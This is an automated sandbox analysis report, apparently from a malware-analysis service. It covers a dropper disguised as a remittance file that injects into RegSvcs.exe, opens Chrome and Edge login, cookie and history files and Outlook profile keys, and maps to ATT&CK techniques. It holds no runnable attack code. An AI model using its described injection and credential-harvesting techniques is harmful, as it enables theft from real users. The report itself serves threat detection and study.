                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06169548 LdrInitializeThunk,3_2_06169548
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_03EC42E0 mov eax, dword ptr fs:[00000030h]0_2_03EC42E0
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_03EC5960 mov eax, dword ptr fs:[00000030h]0_2_03EC5960
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_03EC5900 mov eax, dword ptr fs:[00000030h]0_2_03EC5900
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F498D8 mov eax, dword ptr fs:[00000030h]2_2_03F498D8
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F49938 mov eax, dword ptr fs:[00000030h]2_2_03F49938
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F482B8 mov eax, dword ptr fs:[00000030h]2_2_03F482B8
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F5A1A0 mov eax, dword ptr fs:[00000030h]6_2_03F5A1A0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F5A140 mov eax, dword ptr fs:[00000030h]6_2_03F5A140
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F58B20 mov eax, dword ptr fs:[00000030h]6_2_03F58B20
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0041F250 SetUnhandledExceptionFilter,6_2_0041F250
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0041A208
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00417DAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 54D008Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AD3008Jump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                  Source: z84TTREMITTANCEUSD347_432_63.exe, name.exeBinary or memory string: Shell_TrayWnd
                  Source: z84TTREMITTANCEUSD347_432_63.exe, name.exe.0.drBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,0_2_0041E364
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6004, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR
                  Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4560135222.0000000000395000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: name.exeBinary or memory string: WIN_XP
                  Source: name.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                  Source: name.exeBinary or memory string: WIN_XPe
                  Source: name.exeBinary or memory string: WIN_VISTA
                  Source: name.exeBinary or memory string: WIN_7
                  Source: name.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4560135222.000000000039D000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4562656465.00000000026CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6004, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6004, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR
                  Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4560135222.0000000000395000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_004652BE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00476619
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,6_2_0046CEF3
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting
                  2
                  Valid Accounts
                  2
                  Native API
                  111
                  Scripting
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  21
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  4
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Valid Accounts
                  2
                  Valid Accounts
                  3
                  Obfuscated Files or Information
                  Security Account Manager3
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder
                  21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS117
                  System Information Discovery
                  Distributed Component Object Model21
                  Input Capture
                  1
                  Non-Standard Port
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  11
                  Masquerading
                  LSA Secrets121
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder
                  2
                  Valid Accounts
                  Cached Domain Credentials11
                  Virtualization/Sandbox Evasion
                  VNCGUI Input Capture24
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Virtualization/Sandbox Evasion
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
